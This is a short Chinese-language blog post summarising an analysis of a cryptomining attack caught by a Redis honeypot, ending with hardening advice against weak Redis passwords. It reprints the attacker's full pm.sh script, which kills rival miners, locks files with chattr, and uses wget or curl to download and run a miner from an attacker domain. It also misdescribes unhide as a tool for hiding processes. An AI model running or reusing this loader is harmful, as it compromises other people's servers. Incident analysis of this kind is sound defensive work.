概述
全文参见《近期基于Redis蜜罐捕获的恶意挖矿活动》
链接地址:https://www.freebuf.com/articles/system/256715.html
这里是搭建了一个蜜罐,等待攻击者入瓮,而实际在生产环境中,因为Redis弱密码的存在,导致自己的服务器成为了攻击者。
攻击者通过redis的默认端口,弱口令密码,注入到redis服务器内部,大概有4个Back1-4的crontab进程。
如下图,图来自FreeBUF,为借图:
对应下载文件的链接地址: http://d.powreofwish.com/pm.sh
pm.sh的脚本文件内容:
PATH=$PATH:/usr/bin:/bin:/sbin:/usr/sbin:/usr/local/bin:/usr/local/sbin
cd /usr/bin
if [ -x "/usr/bin/md5sum" -o -x "/bin/md5sum" ];then
sum=`md5sum pamdicks|grep b5a9c7bd8fdb2b6e5c4431a90b83010f|grep -v grep |wc -l`
if [ $sum -eq 1 ]; then
chmod +x /usr/bin/pamdicks
/usr/bin/pamdicks
exit 0
fi
fi
sleep 1
if [ -x "$(command -v apt-get)" ]; then
export DEBIAN_FRONTEND=noninteractive
apt-get install -y unhide
fi
sleep 1
if [ -x "$(command -v yum)" ]; then
yum install -y epel-release
yum install -y unhide
fi
sleep 1
unhide quick |grep PID:|awk '{print $4}'|xargs -I % kill -9 % 2>/dev/null
ps aux | grep -v grep | grep 'hearme' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'cc' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'pc' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'xr' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'png' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kdevtmpfsi' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'ups' | awk '{print $2}' | xargs -I % kill -9 %
pkill ups
pkill cc
pkill pc
pkill xr
pkill png
pkill kdevtmpfsi
sleep 1
/usr/bin/chattr -i /usr/bin/pamdicks
/usr/bin/chattr -i /var/lib/cc
/usr/bin/t -i /usr/bin/pamdicks
/usr/bin/t -i /var/lib/cc
/bin/rm -rf /usr/bin/pamdicks
/bin/rm -rf /var/lib/cc
/usr/bin/chattr -i /tmp/kdevtmpfsi
echo 1 > /tmp/kdevtmpfsi
/usr/bin/chattr +i /tmp/kdevtmpfsi
/usr/bin/t -i /tmp/kdevtmpfsi
echo 1 > /tmp/kdevtmpfsi
/usr/bin/t +i /tmp/kdevtmpfsi
if [ -x "/usr/bin/wget" -o -x "/bin/wget" ]; then
wget -c http://a.powreofwish.com/cc -O /var/lib/cc && chmod +x /var/lib/cc && /var/lib/cc
elif [ -x "/usr/bin/curl" -o -x "/bin/curl" ]; then
curl -fs http://a.powreofwish.com/cc -o /var/lib/cc && chmod +x /var/lib/cc && /var/lib/cc
elif [ -x "/usr/bin/wge" -o -x "/bin/wge" ]; then
wge -c http://a.powreofwish.com/cc -O /var/lib/cc && chmod +x /var/lib/cc && /var/lib/cc
elif [ -x "/usr/bin/get" -o -x "/bin/get" ]; then
get -c http://a.powreofwish.com/cc -O /var/lib/cc && chmod +x /var/lib/cc && /var/lib/cc
elif [ -x "/usr/bin/cur" -o -x "/bin/cur" ]; then
cur -fs http://a.powreofwish.com/cc -o /var/lib/cc && chmod +x /var/lib/cc && /var/lib/cc
elif [ -x "/usr/bin/url" -o -x "/bin/url" ]; then
url -fs http://a.powreofwish.com/cc -o /var/lib/cc && chmod +x /var/lib/cc && /var/lib/cc
else
rpm -e --nodeps wget
yum -y install wget
wget -c http://a.powreofwish.com/cc -O /var/lib/cc && chmod +x /var/lib/cc && /var/lib/cc
fi
通过wget和curl下载对应的挖矿程序后,通过unhiden进行隐藏此程序;
unhide 是一个小巧的网络取证工具,能够发现那些借助 rootkit、LKM 及其它技术隐藏的进程和 TCP/UDP 端口。
对应的程序可以通过IDA进行打开,上述文件有描述,不再赘述了。
避免弱口令,常用端口请做下修改,避免使用root用户直接启动redis服务,时常观察你自己的服务器,有没有爆高的进程在跑。
安全无小事,一个不留意,你的裤子就被别人给脱了。